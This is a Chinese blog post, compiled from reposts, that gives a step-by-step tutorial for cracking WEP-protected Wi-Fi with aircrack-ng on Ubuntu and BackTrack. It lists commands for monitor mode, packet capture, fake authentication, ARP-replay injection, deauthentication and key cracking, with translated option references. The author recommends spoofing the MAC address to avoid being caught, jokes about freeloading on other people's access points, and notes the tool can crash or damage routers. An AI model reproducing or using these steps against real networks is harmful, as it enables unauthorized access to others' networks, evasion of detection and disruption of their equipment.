Chinaunix首页 | 论坛 | 博客
  • 博客访问: 9145425
  • 博文数量: 1725
  • 博客积分: 12961
  • 博客等级: 上将
  • 技术积分: 19840
  • 用 户 组: 普通用户
  • 注册时间: 2009-01-09 11:25
个人简介

偷得浮生半桶水(半日闲), 好记性不如抄下来(烂笔头). 信息爆炸的时代, 学习是一项持续的工作.

文章分类

全部博文(1725)

文章存档

2024年(1)

2023年(26)

2022年(112)

2021年(217)

2020年(157)

2019年(192)

2018年(81)

2017年(78)

2016年(70)

2015年(52)

2014年(40)

2013年(51)

2012年(85)

2011年(45)

2010年(231)

2009年(287)

分类: 其他平台

2013-06-17 18:02:13

http://blog.sina.com.cn/s/blog_55e606c20100k25m.html

一、安装Ubuntu和aircrack-ng

先安装
Ubuntu ,更新系统到最新
终端中输入
sudo apt-get install aircrack-ng 安装aircrack-ng
没联网的话
到别的电脑上网下载aircrack-ng Ubuntu DEB安装包 安装

下载地址:

二、破解过程

1、启动无线网卡的监控模式,在终端中输入:sudo
airmon-ng start wlan0
(wlan0是无线网卡的端口,可在终端中输入
ifconfig 查看)

2、查看无线AP在终端中输入:
sudo
airodump-ng mon0
(特别说明:启动监控模式后无线网的端口现在是
mon0 !!!)
看看有哪些采用wep加密的AP在线,然后按
ctrl+c 退出,保留终端

3、抓包
另开一个终端,输入:
sudo
airodump-ng -c 6 --bssid AP's MAC -w wep mon0
(-c
后面跟着的6是要破解的AP工作频道,--bissid后面跟着的AP's
MAC是要欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DATA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和MAC地址,DATA保存的文件名可随便命名)

4、与AP建立虚拟连接
再另开一个终端,输入:
sudo
aireplay-ng -1 0 -a AP's MAC -h My MAC mon0
(-h后面跟着的My
MAC是自己的无线网卡的MAC地址,命令:
iwlist
wlan0 scanning
可查看自己的MAC地址)

5、进行注入
成功建立虚拟连接后输入:
sudo
aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0
现在回头看下步骤3的终端是不是DATA在开始飞涨!

6、解密
收集有5000个以上的DATA之后,另开一个终端,输入:
sudo
aircrack-ng wep*.cap
进行解密
(如果没算出来的话,继续等,aircrack-ng
会在DATA每增加多5000个之后就自动再运行,直到算出密码为至)

7、收工
破解出密码后在终端中输入
sudo airmon-ng stop mon0
关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。现在可以冲浪去了,或者重复步聚1-7破解其它的AP
呵呵兄弟们冲浪时可别太猛了,不然把主人给冲翻了可就不好。



8:如果破解后出现
 例如:
KEY
FOUND! 12:34:5A:BC:DE

Decrypted
correctly: 100%

 密码就是
:12345abcde

这个密码是我花了2小时,9000个
data后得到的。
Ubuntu下破解WLAN无线网络密码资料(转)



以上步骤在ubuntu11.04
thinkpad x200 通过。

Ubuntu下破解WLAN无线网络密码资料(转)

====================================================

 


=========================================================


本文
主要是针对无线网络的密码破解,使用平台 linux 2.26.21.5 ,实现环境 BACKTRACK 3 FINAL(USB),无线破解工具
Aircrack-ng ,官方网站 .org ,Aircrack-ng系列工具也有windows
平台版本,但是本人的小黑的始终不能在win下抓包,所以只能 弃 win 从 lin 了,另外 win 下扫描到的 AP 也比 lin 下少了很多。其实 WIN
并不完整的支持 TCP/IP 协议族,有些协议 win 直接丢弃不用。网络本来从一开始就是 unix 的天下,win
只是在后来加入了网络的功能。


Aircrack-ng工具包有很多工具,我用到的
工具主要有以下几个:


airmon-ng
处理网卡工作模式


airodump-ng
抓包


aircrack-ng
破解


aireplay-ng
发包,干扰


另外还要用到以下
linux 命令:


ifconfig
查看修改网卡状态和参数


macchanger
伪造 MAC


iwconfig
主要针对无线网卡的工具 (同 ifconfig)


iwlist
获取无线网络的更详细信息


另外还有其他的
linux 基本命令,我就不提示了。


具体破解步骤:


1.
修改无线网卡状态:先 dow


2.
伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能


3.
修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡


4.
修改无线网卡状态: up


5.
查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标


6.
监听抓包:生成 .cap 或 .ivs


7.
干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包


8.
破解 .cap 或 .ivs ,获得 WEP 密码,完成破解


下面详细介绍一下
各个命令的基本用法(参照命令的英文说明)


1.
ifconfig


用来配置网卡,我们这里主要用来
禁用和启用 网卡:


ifconfig
ath0 down


ifconfig
ath0 up


禁用一下网卡的目的是为了下一
步修改 MAC 。


2.macchanger


用来改变网卡的
MAC 地址,具体用法如下:


usage:
macchanger [options] device


-h
显示帮助


-V
显示版本


-s
显示当前MAC


-e
不改变mac,使用硬件厂商写入的MAC


-a
自动生成一个同类型的MAC,同厂商的


-A
自动生成一个不同类型的MAC,不同厂商的


-r
生成任意MAC


-l
显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品


-m
设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。


3.airmon-ng



动无线网卡进入 Monitor 模式,


useage:
airmon-ng [channel]



启动,停止,检测



指定无线网卡


[channel]
监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了


4.iwconfig


专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。


useage:iwconfig
interface [options]


[essid{NN|ON|OFF}]
指定essid号 开启关闭


[nwid{NN|on|off}]
指定网络id号 开启关闭


[mode
{managed|ad-hoc|....}] 指定无线网络工作模式/类型


[freq
N.NNNN[K|M|G]] 指定工作频率


[channel
N] 指定频道


[ap
{N|off|auto}] 指定AP号 关闭/自动


[sens
N] sens 号


[nick
N] nick 号


[rate
{N|auto|fixed}] 速率控制


[rts
{N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了


[frag
{N|auto|fixed|off}] 碎片控制


[enc
{NNNN-NNNN|off}] 范围


[power
{period N|timeout N}] 电源 频率/超时


[retry
{limit N|lifetime N}] 重试 限次/超时


[txpower
N{mw|dBm}] 功率 毫瓦/分贝


[commit]
处理


5.iwlist


主要用来
显示无线网卡的一些附加信息,同上


useage:
iwlist [interface] options


scanning
扫描


frequency
频率


channel
频道


bitrate
速率


rate
速率


encryption
加密


key
密钥


power
电源


txpower
功率


ap
ap


accespoints
ap


peers
直连


event
事件


6.airodump-ng


抓包工具,我最喜欢用的,详细用法如下:


usage:
airodump-ng [,,...]


Options:


--ivs
:仅将抓取信息保存为 .ivs


--gpsd
:使用 GPSd


--write
:保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分


-w
:同 --write


--beacons
:保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的


--update
:显示更新延迟,没有用过


--showack
:显示ack/cts/rts状态,还是那句,不知道rts就不用看了


-h
:隐藏已知的,配合上面的选项使用


-f
:跳频时间


--berlin

:无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻
译的都会有出入,这是我的理解.(mhy_mhy注)


-r
:从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵


Filter
options:


--encrypt
: 使用密码序列过滤 AP


--netmask
: 使用掩码过滤 AP


--bssid
: 使用 bssid 过滤 AP


-a
: 过滤无关的客户端


默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下
命令操作:


--channel
:指定频道


--band
:制定带宽


-C
:指定频率MHz


--cswitch
: 设置频道交换方式


0
: FIFO (default) 先进先出(默认)


1
: Round Robin 循环


2
: Hop on last 最后一跳


-s
: 同上


--help
: 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文


7.aireplay-ng


搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的
AP 设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.


usage:
aireplay-ng


Filter
options:


-b
bssid : AP的 MAC


-d
dmac : 目标的 MAC


-s
smac : 来源的 MAC


-m
len : 最小包长度


-n
len : 最大包长度


-u
type : 帧控制, type field


-v
subt : 帧控制, subtype field


-t
tods : 帧控制, To DS bit


-f
fromds : 帧控制, From DS bit


-w
iswep : 帧控制, WEP bit


-D
: 禁用 AP 发现功能


Replay
options:


-x
nbpps : 每秒包数量


-p
fctrl : 框架设定 (hex)


-a
bssid : 设置AP的 mac


-c
dmac : 设置目标的 MAC


-h
smac : 设置来源的 mac


-g
value : 改变环缓存大小 (默认8)


-F
: 选择第一个匹配的包


Fakeauth
attack options:


-e
essid : 设置目标 AP 的 SSID


-o
npckts : 每秒爆破的包数量 (0 自动, 默认 1)


-q
sec : 存活时间 秒


-y
prga : 共享可信的 key流


ARP欺骗原理
Replay attack options:


-j
: 注入 fromDS 数据包,还没有用过这个选项


Fragmentation
attack options:


-k
IP : 设置目的IP 碎片


-l
IP : 设置源IP碎片


Test
attack options:


-B
: 激活 bitrate 测试


source
options:


-i
iface : 设置抓包的接口设备


-r
file : 从pcap文件析取数据包


attack
modes (Numbers can still be used): 攻击模式,最具杀伤力的地方


--deauth
count : 不信任一切 (-0)


--fakeauth
delay : 欺骗AP的信任 (-1)


--interactive
: 交互的选择 (-2)


--arpreplay
: 标准的 ARP欺骗原理-request replay (-3)


--chopchop
: 解密 WEP 包 (-4)


--fragment
: 生成有效的 key流 (-5)


--caffe-latte
: 从客户端获取新的 IVs (-6)


--cfrag
: 对客户端进行碎片攻击 (-7)


--test
: 测试注射及效果 (-9)


--help
: 显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付那些不给出作者就引用的人,鄙视抄袭.


8.aircrack-ng


破解KEY,漫长的过程.漫不漫长取决于两个方面:
一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.


usage:
aircrack-ng [options] <.cap / .ivs file(s)>


Common
options:


-a
: 暴破 (1/WEP, 2/WPA-PSK)


-e
: 选择 essid 为目标


-b
: 选择 ap的 mac 为目标,就是破解识别的关键字


-q
: 使用安静模式,无数出模式


-C
: 将所有的 AP 合并为一个虚拟的


Static
WEP cracking options:


-c
: 仅搜索字母数字


-t
: 仅搜索二进制


-h
: 搜索数字关键字 (用于坏掉的部分),翻译不出来了


-d
: 指定掩码(A1:XX:CF:YY)


-m
: 用 MAC 匹配可用的数据包


-n
: WEP 长度 64/128/152/256/512


-i
: WEP 索引(1 to 4), default: any


-f
: 暴破强度 默认2,原文字面意思是"禽兽强迫 捏造事实",呵呵


-k
: 禁用一种破解方式 (1 to 17)


-x
or -x0 : 禁用最新关键字暴破


-x1
: 使用最新关键字暴破 默认


-x2
: 用最新两个字节暴破


-y
: 实验单线程模式


-K
: KoreK 攻击 (pre-PTW)


-s
: 显示为 ASCII


-M
: 最大数量 ivs 使用


-D
: WEP 非隐蔽模式


-P
: PTW debug: 1 disable Klein, 2 PTW


-1
: 尝试一次 PTW


WEP
and WPA-PSK cracking options:


-w
: 指定目录文件,可以多个


-r
: 制定 airolib-ng 数据库,不能和 -w 一起使用


--help
: 显示这个帮助


说明:
作者: papagogo 时间: 2008-11-21 11:31


【接一楼】


说明:


好了,用法都解释完了,主要是后面这三个命令,这是我从英文译过来的,结合我的使用情况,以及我的理解.参数全,没有漏掉任何一项,可能我是第一个把这个完整翻译过来的,之前我没有找到有翻译好的,有些地方并不是准确的遵循原文,希望感兴趣的朋友在转载的时候注上我:mhy_mhy.


下面以我的硬件实例来操作一下:


我的硬件是
atheros 的 a/b/g 无线网卡,在 linux 中显示为 ath0 ,我只列出我常用的命令步骤,不再做任何解释:


ifconfig
ath0 down


macchanger
-r ath0


macchanger
-r wifi0


ifconfig
ath1 up


airmon-ng
start ath1 6


iwconfig
ath1


iwlist
ath1 scanning


airodump-ng
-w *.cap -c 6 ath1


aireplay-ng
-1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1


aireplay-ng
-5 -b ap_mac -h XXXXXXXXXX ath1


aireplay-ng
-3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1


aireplay-ng
-0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath1


aireplay-ng
-3 -b -h -i ath1


aircrack-ng
-x -f 2 *.cap


aircrack-ng
-w passdict.txt *.cap


aircrack-ng
-n 64 -b apmac *.ivs


aircrack-ng
-w passdict.txt -b 00:00:00:00:00:00 *.cap


注:1
Aircrack-ng在新德里软件里可以找到


2macchanger
在新德里软件管理也有


ubuntu 12.04 安装和使用aircrack-ng 教程


sudo apt-get install aircrack-ng

却提示
Package aircrack-ng is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
iw:i386 iw

E: Package ‘aircrack-ng’ has no installation candidate
竟然没有这个包,难道是因为我使用的是64位的ubuntu 12.04 系统的原因?

谷歌一下,发现不是,是因为某些原因aircrack-ng 已经从ubuntu 12.04的软件源中移除了,ubuntu 10.04中还有。
那怎么在ubuntu 12.04 中安装aircrack-ng 呢?可以从网上下载源码编译安装。

首先安装两个扩展
sudo apt-get install build-essential
sudo apt-get install libssl-dev

然后到 下载最新版的aircrack-ng,解压它
tar -xvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1
gedit common.mak
找到 CFLAGS ?= -g -W -Wall -Werror -O3 并把它改为
CFLAGS ?= -g -W -Wall -O3
保存好后,开始编译安装
make
sudo make install
完了之后它会提示 Run ‘airodump-ng-oui-update’ as root (or with sudo) to install or update Airodump-ng OUI file (Internet connection required).
于是输入
sudo airodump-ng-oui-update
更新好后即可。
那怎么使用ubuntu 中的aircrack-ng 来破解无线密码呢?
ubuntu 中 aircrack-ng 使用教程
1、启动无线网卡的监控模式,在终端中输入:sudo airmon-ng start wlan0
(wlan0是无线网卡的端口,可用命令 ifconfig 查看)

2、查看无线AP在终端中输入:
sudo airodump-ng mon0
(mon0 是启动监控模式后无线网的端口)
查看有哪些采用wep加密的AP在线,然后按 ctrl+c 中止,不要关闭终端。

3、抓包
打开另一个终端,输入:
sudo airodump-ng -c 6 –bssid AP’s MAC -w wep mon0
(-c 后面跟着的6是要破解的AP工作频道,–bissid后面跟着的AP’sMAC是要欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DATA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和MAC地址,DATA保存的文件名可随便命名)

4、与AP建立虚拟连接
再打开一个新终端,输入:
sudo aireplay-ng -1 0 -a AP’s MAC -h My MAC mon0
(-h后面跟着的My MAC是自己的无线网卡的MAC地址,即ifconfig命令下wlan0对应的mac地址)

5、进行注入
成功建立虚拟连接后输入:
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP’s MAC -h My MAC mon0
现在回头看下步骤3的终端是不是DATA在开始飞涨!(那串ff照抄就行)

6、解密
收集有15000个以上的DATA之后,另开一个终端,切换到aircrack-ng-1.1目录,执行以下命令
sudo aircrack-ng wep*.cap
进行解密
(如果没算出来的话,继续等,aircrack-ng 会在DATA每增加多15000个之后就自动再运行,直到算出密码为至,注意此处文件的名字要与步骤3里面设置的名字一样,且*号是必需的)

7、收工
破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。

如果要卸载ubuntu 上的aircrack-ng,可切换到aircrack-ng-1.1 目录,执行
sudo make uninstall
最后在手动删除该目录及目录下的东西即可。

阅读(4097) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~